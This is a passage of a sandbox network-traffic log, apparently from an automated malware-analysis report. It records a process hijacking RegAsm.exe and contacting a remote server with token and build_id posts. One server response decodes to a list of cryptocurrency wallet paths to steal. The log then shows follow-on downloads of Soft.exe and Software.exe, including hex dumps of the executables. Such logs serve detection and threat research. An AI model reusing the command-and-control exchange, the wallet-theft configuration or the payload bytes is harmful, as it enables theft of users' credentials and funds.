00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a Data Ascii: t@++t+t+u+uQ<0\|*<9&w/c5~bASJCtvB
2024-03-28 08:15:50 UTC	15589	IN	Data Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e Data Ascii: \|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49848	78.46.229.36	443	6284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:51 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKEBFHIJECFIDGDGCGHC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:15:51 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 33 39 34 36 65 39 64 64 66 39 31 66 62 33 30 63 32 35 63 39 62 33 37 37 35 35 35 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 37 65 32 62 37 37 35 32 32 64 30 61 39 32 66 66 64 37 35 33 36 37 31 62 30 63 37 30 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 Data Ascii: ------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="token"373946e9ddf91fb30c25c9b377555812------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="build_id"27e2b77522d0a92ffd753671b0c70869------BKEBFHIJECFIDGDGCGHCCont
2024-03-28 08:15:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:15:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:15:52 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49850	78.46.229.36	443	6284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:52 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBFHDBKJEGHJJJKFIIJE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:15:52 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 33 39 34 36 65 39 64 64 66 39 31 66 62 33 30 63 32 35 63 39 62 33 37 37 35 35 35 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 37 65 32 62 37 37 35 32 32 64 30 61 39 32 66 66 64 37 35 33 36 37 31 62 30 63 37 30 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 Data Ascii: ------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="token"373946e9ddf91fb30c25c9b377555812------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="build_id"27e2b77522d0a92ffd753671b0c70869------FBFHDBKJEGHJJJKFIIJECont
2024-03-28 08:15:53 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:15:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:15:53 UTC	131	IN	Data Raw: 37 38 0d 0a 61 48 52 30 63 48 4d 36 4c 79 39 6a 5a 57 35 30 63 6d 39 7a 62 57 6c 7a 63 32 56 34 64 47 56 75 63 32 6c 76 62 6e 4d 75 59 32 39 74 4c 31 4e 76 5a 6e 51 75 5a 58 68 6c 66 47 68 30 64 48 42 7a 4f 69 38 76 59 32 56 75 64 48 4a 76 63 32 31 70 63 33 4e 6c 65 48 52 6c 62 6e 4e 70 62 32 35 7a 4c 6d 4e 76 62 53 39 54 62 32 5a 30 64 32 46 79 5a 53 35 6c 65 47 56 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 78aHR0cHM6Ly9jZW50cm9zbWlzc2V4dGVuc2lvbnMuY29tL1NvZnQuZXhlfGh0dHBzOi8vY2VudHJvc21pc3NleHRlbnNpb25zLmNvbS9Tb2Z0d2FyZS5leGV80

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49851	162.19.138.79	443	6284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:53 UTC	215	OUT	GET /Soft.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: centrosmissextensions.com Cache-Control: no-cache
2024-03-28 08:15:54 UTC	423	IN	HTTP/1.1 200 OK Connection: close content-type: application/x-msdownload last-modified: Sun, 24 Mar 2024 23:09:54 GMT accept-ranges: bytes content-length: 8060192 date: Thu, 28 Mar 2024 08:15:54 GMT server: LiteSpeed vary: User-Agent alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-03-28 08:15:54 UTC	16384	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0b 00 da c5 d4 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 66 00 00 00 7a 7f 00 00 00 00 00 5b 4a eb 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 04 01 00 04 00 00 ae 10 7b 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEde"fz[J@@{`
2024-03-28 08:15:54 UTC	16384	IN	Data Raw: 61 ca b7 1c c6 53 3b 52 e8 30 0c 3f 33 81 45 f9 62 44 9b de ec 30 32 8a e5 d3 5c 43 d3 7b c8 26 2b bc c0 94 82 cf e6 02 c7 b6 29 6d 4e 6f f3 28 2b 89 ee 2b 8f e1 94 82 cf 70 71 4c f5 99 9f 7b 16 67 00 c6 a8 e7 5b 5e 65 fd ee d4 e5 94 4c f7 18 54 8c 2b 2d 4a 2b 35 79 94 82 cf 99 20 7b 9f f6 69 10 69 ae 17 4c a0 75 0c 75 46 75 3f 27 d4 d8 59 a4 57 13 51 42 a7 88 ee bd cb 1a 51 25 ab 5b bc 67 a4 eb 16 f3 14 79 00 00 00 00 1d ba 31 19 d5 37 f1 92 36 95 a1 54 7f 06 cb 51 4e c4 25 bb be 5f ed 79 54 ed 2b e3 a6 87 0d 6c c1 fb 3e 5b 1a cc 74 2d 08 8a 8e ff c2 18 d4 a1 90 66 3b 2e fa f4 79 fb 2f 59 5f 88 c6 fe ff ff ff 9d 11 a2 01 74 fa 5f f5 1c 97 8c 1d 8c aa 75 6c 92 3e 0c be e3 d3 32 19 ed 43 0b 8f 94 49 1c 51 6d b0 91 77 d1 f1 51 c6 de b7 f6 b1 2b 1d c5 e6 c7 Data Ascii: aS;R0?3EbD02\C{&+)mNo(++pqL{g[^eLT+-J+5y {iiLuuFu?'YWQBQ%[gy176TQN%_yT+l>[t-f;.y/Y_t_ul>2CIQmwQ+
2024-03-28 08:15:54 UTC	16384	IN	Data Raw: 8a 80 58 f0 1c e8 17 32 38 57 88 0b 36 74 27 b6 22 25 87 52 78 59 95 fe d1 81 28 eb bb 87 b2 1f 13 43 e0 a8 68 30 e9 fc 2f 26 61 cd 49 41 3b c0 bf d1 4d af f9 76 de 50 56 fe 65 8a 10 88 be 08 76 8b d8 be 64 13 99 6f a5 c4 1c d7 19 f0 47 29 0f 17 e9 25 99 1c a0 c3 c6 7a cd c4 f7 22 50 c0 a3 b2 84 33 7d fb ea de 48 6c ba d2 eb 97 f4 74 4b 8d 4f 85 3a 1b 75 1e 46 e1 e5 88 fd 18 d6 1d a2 a4 1d c2 0b 39 9f 50 05 53 15 03 d7 0c 14 fc 15 b8 78 e4 a7 72 82 e0 d1 44 d6 73 80 0e da a1 cb 15 47 7c e6 51 c9 ae 37 1d 1b 1a b6 b5 e4 15 1d 40 76 0b 8d cf fb a4 2d d9 ad f9 64 99 c9 6d 11 0f 7d b3 79 b6 e8 0c d9 86 c1 66 3d dd 2d 50 d5 a1 b1 8b 3e 47 58 0d f3 36 0c 5d 6a 58 43 30 02 c4 a4 90 7c 65 de 36 2e 21 02 45 42 2f d5 50 e7 f0 f8 4c 18 f5 31 96 9f 45 68 bc 16 67 b2 Data Ascii: X28W6t'"%RxY(Ch0/&aIA;MvPVevdoG)%z"P3}HltKO:uF9PSxrDsG\|Q7@v-dm}yf=-P>GX6]jXC0\|e6.!EB/PL1Ehg
2024-03-28 08:15:54 UTC	16384	IN	Data Raw: 85 74 b7 1a db 74 48 32 79 a2 53 31 55 fe 4d b7 c2 f8 db 9d 4c 2d 99 39 be e6 0e 49 d2 cf 5b f5 eb 22 18 db 14 78 18 a1 d3 fa e3 91 b9 07 ad 33 1b 8f 60 99 84 e8 fa 3c 12 27 81 f1 9f e6 75 63 6a e0 f6 a7 50 43 e0 fd e0 9f f5 29 89 16 0a 61 75 53 12 33 1e bc 20 8c 8b e5 05 26 64 84 39 c7 40 52 37 3b 94 d9 8a cb e3 8b 4c 03 f5 da 92 3f aa be 17 a7 4b 21 55 3e 75 a1 6f 42 80 88 3a af ca d1 54 4a 64 5e d7 8f 97 37 db ac d3 91 fc 32 5e d5 73 83 b2 b7 41 6e ee 35 b0 b0 20 51 c8 6a 98 e4 26 ed f0 16 88 06 70 61 4a fa c5 f9 e7 1e 9b e5 9f 20 dc 17 1c cc 1e ce 35 09 e5 cc aa 15 b1 64 63 59 f8 ed 80 16 a5 f0 e9 37 9d 00 67 ac b7 1a 4d 24 1e df 5e 1f a3 43 de 6a d6 c3 9a b5 d7 c3 2d 16 fa df ac 81 d4 d1 26 b5 9d de 6d 1c cf c3 99 04 90 20 50 d2 e5 2d 1f 5c be 62 3c Data Ascii: ttH2yS1UML-9I["x3`<'ucjPC)auS3 &d9@R7;L?K!U>uoB:TJd^72^sAn5 Qj&paJ 5dcY7gM$^Cj-&m P-\b<
2024-03-28 08:15:54 UTC	16384	IN	Data Raw: 4f 73 83 18 fa c4 d1 40 13 d3 e5 a3 cb 95 a9 05 e5 28 20 b4 e9 54 d2 b9 dd 23 8c d7 3c 84 f8 0e d0 72 23 2f d5 f0 ff 05 7d 6d be 12 ad 68 95 19 4a 73 6f 58 ac 6d de db ed ef cf 81 37 08 5a 9f 47 bf 5e 20 94 4c 05 67 46 6f 4d 16 9d 98 97 fb 56 52 73 45 00 58 cf 0d 07 41 e7 b7 c5 ff cd 5e 4c 3c 06 80 42 15 12 47 ff 7e e0 96 a1 df ce 4e ae ce aa 3f 74 b1 d5 d2 de bd 3a 82 ed 55 df ad 26 9a 20 89 cd c7 4e 15 22 68 c8 79 cd a1 98 44 95 4d 9c 1d 80 12 89 27 80 b8 4b 3a f9 9d a8 82 e8 4b de 65 65 86 c6 09 3a cf 32 ca dc e4 fe 1e 89 fe e7 c6 d6 0d 61 8b 84 ef c0 4a 53 79 c5 da fd ec d9 3f eb 10 0d cd ea ad 73 2f 87 27 38 06 7e 10 15 6e 7e b4 46 5c d4 fd 54 d3 0c 1c 69 e9 5d 69 2c 8f ea a5 74 b7 8a e1 86 04 4a c0 71 55 ef 02 42 d2 68 ee b6 72 e3 4f af 5c 8c 03 b3 Data Ascii: Os@( T#<r#/}mhJsoXm7ZG^ LgFoMVRsEXA^L<BG~N?t:U& N"hyDM'K:Kee:2aJSy?s/'8~n~F\Ti]i,tJqUBhrO\
2024-03-28 08:15:54 UTC	16384	IN	Data Raw: f0 e8 41 23 72 50 84 f7 33 b9 00 23 1c 03 df eb 72 91 24 70 8e 4f c6 d1 13 ab 3b ce e7 21 1f 57 9c 4b 52 11 86 5c 8a b7 de 0d 90 f1 68 41 91 a6 28 d4 9f 79 c6 44 a9 68 38 1a 6e ae 13 99 97 9c 88 9c 9e 00 9c f5 3b b1 d1 93 17 5c d7 ea 7a d1 d2 64 db 40 67 2b e3 af 20 40 aa 0a 5b 57 1a 6a 62 12 8f ad d7 0e 81 16 c4 c5 48 82 41 aa 4e 9f 2a 83 31 15 06 3f 83 d3 e9 aa 67 a4 32 51 d1 7f bb 57 5b 7d 8a b5 46 2e cb 79 a2 ab ad 7f 92 49 02 2a b2 33 c9 05 8d a7 f8 f8 10 93 5d 0a 3f da 64 2b ed 4d 64 55 8c 76 54 4e d7 8e 30 ee ba 8c c3 81 82 62 fa af 9c 6d 35 52 45 6b 50 62 bd 41 c4 92 3b 85 64 69 a0 25 c9 4b 7e 43 23 7a ee b3 1b b9 14 85 a0 12 d6 57 f6 28 21 08 4e 96 8d 39 10 88 3f 4b 59 b2 6b 11 b4 98 1c 8c 07 a3 e7 4a 6f 0b 6d 61 1f 13 e8 d4 d8 90 1a 50 cd b5 6d Data Ascii: A#rP3#r$pO;!WKR\hA(yDh8n;\zd@g+ @[WjbHAN1?g2QW[}F.yI3]?d+MdUvTN0bm5REkPbA;di%K~C#zW(!N9?KYkJomaPm
2024-03-28 08:15:54 UTC	16384	IN	Data Raw: ea bb de c4 1a 91 4d 38 51 aa 38 dc 44 d5 ed b6 67 c8 4c 5e ce 3c 1f 12 c1 f9 a4 da 7e 81 d3 b7 3f 61 27 97 db 33 fd 35 52 69 66 c2 b3 e3 45 50 0f 11 0f 83 51 42 b3 eb 73 4c 53 7f 51 de 85 ee 4e ef f2 f2 66 0b 9d 2a 54 15 58 86 cd 9e 65 c9 57 1e 9b dc 5e 4d 32 04 ed e1 e4 d1 e2 ce 30 e8 ad 9a 27 10 9d 94 6f 89 44 b8 86 43 56 af 51 05 65 4f a8 6c 77 72 cf 46 81 38 f2 fa 08 3e e9 84 f5 24 4d ae e9 7f 6e ae f8 6b f0 0e 34 59 d9 da 4c f9 bb 97 c4 25 7c 10 cc 74 fc 0b 1c c8 d5 d9 0b 71 a4 c8 4d 5e 7b 75 6a b4 99 5a 4c 80 d0 8f 71 16 fc df db cc dd c1 cc 11 ee 1b 85 f3 08 84 47 e3 55 dd 7a de 8c d9 34 36 b2 82 dd 95 fb 64 e5 8a 2f 2a ca 13 0c f2 2e 93 68 70 1a 78 56 c6 6e 30 96 5c 97 76 89 77 cf d9 14 d8 2e 23 9b 6e df a7 f7 40 af 98 2e f0 29 9b 2d 47 c6 36 eb Data Ascii: M8Q8DgL^<~?a'35RifEPQBsLSQNfTXeW^M20'oDCVQeOlwrF8>$Mnk4YL%\|tqM^{ujZLqGUz46d/.hpxVn0\vw.#n@.)-G6
2024-03-28 08:15:54 UTC	16384	IN	Data Raw: 67 52 17 de 12 d1 8e 1c 71 cf 3e 82 e7 67 8c bc 8d df 4e b7 66 4d 3e 6b 27 08 2f ac f9 43 52 4a 8d 92 02 b4 eb a5 6d 8b c5 2a 44 d4 34 fc 91 b4 03 1a 66 df 59 c7 6d 15 08 ec e7 25 c6 8d 2e 33 50 82 b2 27 08 70 f2 71 1a 41 05 7b dd 1d 44 b2 d2 ec de 0d aa e2 66 b1 9d a2 6a 5f e2 f3 0d 0b df da 44 1c 38 9f bf c3 4f a1 5e c7 d7 42 3d 59 f2 ea 31 c5 cf 13 d9 7e 87 52 14 3b c5 7f 2b 47 7f 3b 57 43 35 0a 08 a9 a1 1d 0b 52 bc 74 a0 fd 3b b1 b5 31 9f ea d1 6d 7e a2 1c 32 09 16 16 47 3e f8 03 e4 d1 14 32 32 da a6 e7 43 b7 d1 51 6e 2a 53 b4 12 bd 55 44 52 2c 03 7b fd ea 5c 78 12 9c 2e ee 38 56 d3 be 45 a3 fc 17 d3 d6 b9 46 1b 4c 2d 20 11 1b 36 72 76 6c 67 3a 18 42 2a 5d 6a d1 68 d9 f8 a9 c6 dc 10 2f 46 a3 fa f3 16 32 a7 46 08 19 6f 4a f2 16 9b 9d bb a7 f6 c2 e4 97 Data Ascii: gRq>gNfM>k'/CRJmD4fYm%.3P'pqA{Dfj_D8O^B=Y1~R;+G;WC5Rt;1m~2G>22CQnSUDR,{\x.8VEFL- 6rvlg:B*]jh/F2FoJ
2024-03-28 08:15:54 UTC	16384	IN	Data Raw: de 1d 2b 2b f4 1b 1f ec 90 7a 90 a8 53 ba 41 d0 ae ac ef 97 03 82 a5 de 14 cf 2e 54 86 28 bd f4 ba ff 13 01 a5 7b a1 96 1e 6c 9c 1f 54 39 8f 0b 50 22 cc 17 9d 6e 0f fa 7e ad 9f 2a 51 f0 04 de 97 79 52 ea 13 42 03 31 b4 bc 44 d7 a3 99 5f 11 c3 7f 6f 0e a1 63 d6 29 12 51 6f fc 6a a9 35 f7 96 ed 66 77 0b 0a a8 a2 2b 6a 0d 3a b6 e1 83 d0 bf 8a 62 63 38 5e 77 e8 d7 3d e4 d4 6e a7 ac 99 ef 9e 38 c6 23 01 78 a4 6a 68 e0 d5 70 1d c6 05 dc fc 68 38 35 4a 48 84 e7 60 dc c5 2b 88 16 82 6e da 81 50 eb e2 ea fa 13 05 32 72 f7 b2 15 ef e0 72 75 ff 74 3b 90 6c 14 b8 1e 21 17 90 14 23 a8 e0 b7 07 0d 8a 77 4d f7 91 2c 10 d5 08 54 22 93 7f 7f 8f b7 b6 f9 73 d5 e2 00 d0 48 16 d2 97 53 25 44 4a cf 77 82 c9 bf 6b fd 6d b2 cd c5 6f 3d 49 30 45 e3 21 c9 12 b1 0e 3c db 82 23 49 Data Ascii: ++zSA.T({lT9P"n~*QyRB1D_oc)Qoj5fw+j:bc8^w=n8#xjhph85JH`+nP2rrut;l!#wM,T"sHS%DJwkmo=I0E!<#I
2024-03-28 08:15:54 UTC	16384	IN	Data Raw: bb 55 41 41 13 72 75 59 fe b8 47 19 ff c3 a2 3e e5 40 86 78 5c f4 c5 cd 02 4f a9 0c 49 6c 90 28 73 75 bf 2a 3a 24 4c d2 03 eb 58 61 f8 41 e2 34 bc 8e a6 dc 2c 24 81 4c b2 4a fb 2d e4 56 6f 3f f1 b5 f3 ea cc 59 88 b5 d3 38 10 f8 8c 34 31 74 fa c7 62 82 4d 29 7b b7 26 6d 51 00 c9 96 5b 12 97 08 e8 db 76 da 42 f8 36 60 bd 62 9e bf 0b a8 41 d5 4a 63 1e 16 47 1e eb d4 13 77 f8 18 93 fc 1c 37 b6 fb f3 df 07 7f bf 7f c6 7f 0c a8 c4 b1 8f 43 fa 78 86 8e d3 91 89 c6 5e 65 e7 bd 2a 9a 2b 00 86 71 91 4b 74 fa a2 9d 61 81 3b d3 c0 d7 d4 a8 18 11 98 6a 29 83 c0 1e f9 37 e5 16 67 de e0 ea ea f6 50 fd 46 b4 79 d7 36 43 dc f3 58 57 22 57 f3 92 19 58 60 42 3d 58 35 28 e5 c3 72 84 ed 39 e4 7d c5 d0 dc ef d0 ff 8b 39 41 ec e7 0d 25 fa ec 2d d5 26 27 99 f8 5e 6e 03 c5 13 ab Data Ascii: UAAruYG>@x\OIl(su:$LXaA4,$LJ-Vo?Y841tbM){&mQ[vB6`bAJcGw7Cx^e+qKta;j)7gPFy6CXW"WX`B=X5(r9}9A%-&'^n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49852	162.19.138.79	443	6284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:57 UTC	219	OUT	GET /Software.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: centrosmissextensions.com Cache-Control: no-cache
2024-03-28 08:15:58 UTC	422	IN	HTTP/1.1 200 OK Connection: close content-type: application/x-msdownload last-modified: Sun, 24 Mar 2024 23:09:50 GMT accept-ranges: bytes content-length: 889599 date: Thu, 28 Mar 2024 08:15:58 GMT server: LiteSpeed vary: User-Agent alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-03-28 08:15:58 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!`G@@@/OQ@@I@/OS@c>@+F@Rich@PELOah:
2024-03-28 08:15:58 UTC	16384	IN	Data Raw: 00 8b 80 1c 01 00 00 85 c0 74 28 81 fb 00 38 7b 00 75 20 50 6a 00 e8 90 1a 00 00 57 bf 40 6a 7a 00 57 ff 15 28 81 40 00 85 c0 74 07 57 53 e8 57 1a 00 00 ff 05 78 1f 7a 00 53 68 fb 03 00 00 56 e8 67 10 00 00 eb 07 c7 45 0c 0f 04 00 00 81 7d 0c 0f 04 00 00 74 0d 81 7d 0c 05 04 00 00 0f 85 98 01 00 00 83 65 fc 00 83 65 f8 00 53 68 fb 03 00 00 e8 3b 10 00 00 53 e8 c8 13 00 00 85 c0 75 07 c7 45 fc 01 00 00 00 be 58 ff 79 00 53 56 e8 da 19 00 00 6a 01 e8 a0 1d 00 00 85 c0 89 45 f4 74 3a 33 c0 33 ff 3b c6 74 32 8d 45 dc 50 8d 45 e8 50 8d 45 d4 50 56 ff 55 f4 85 c0 75 76 85 ff 74 03 66 21 07 56 e8 be 12 00 00 8b f8 66 83 27 00 4f 4f 3b fe 66 c7 07 5c 00 75 ce 53 56 e8 8b 19 00 00 56 e8 ff 12 00 00 33 ff 3b c7 74 03 66 89 38 8d 45 e0 50 8d 45 f4 50 8d 45 ec 50 8d Data Ascii: t(8{u PjW@jzW(@tWSWxzShVgE}t}eeSh;SuEXySVjEt:33;t2EPEPEPVUuvtf!Vf'OO;f\uSVV3;tf8EPEPEP
2024-03-28 08:15:58 UTC	16384	IN	Data Raw: 20 8b 7a 00 89 13 40 00 f5 68 40 00 db 3c 40 00 0a 00 00 00 5c 00 00 00 ff ff ff ff ff ff ff ff 76 00 65 00 72 00 69 00 66 00 79 00 69 00 6e 00 67 00 20 00 69 00 6e 00 73 00 74 00 61 00 6c 00 6c 00 65 00 72 00 3a 00 20 00 25 00 64 00 25 00 25 00 00 00 75 00 6e 00 70 00 61 00 63 00 6b 00 69 00 6e 00 67 00 20 00 64 00 61 00 74 00 61 00 3a 00 20 00 25 00 64 00 25 00 25 00 00 00 00 00 2e 00 2e 00 2e 00 20 00 25 00 64 00 25 00 25 00 00 00 00 00 00 00 00 00 49 00 6e 00 73 00 74 00 61 00 6c 00 6c 00 65 00 72 00 20 00 69 00 6e 00 74 00 65 00 67 00 72 00 69 00 74 00 79 00 20 00 63 00 68 00 65 00 63 00 6b 00 20 00 68 00 61 00 73 00 20 00 66 00 61 00 69 00 6c 00 65 00 64 00 2e 00 20 00 43 00 6f 00 6d 00 6d 00 6f 00 6e 00 20 00 63 00 61 00 75 00 73 00 65 00 73 00 20 Data Ascii: z@h@<@\verifying installer: %d%%unpacking data: %d%%... %d%%Installer integrity check has failed. Common causes
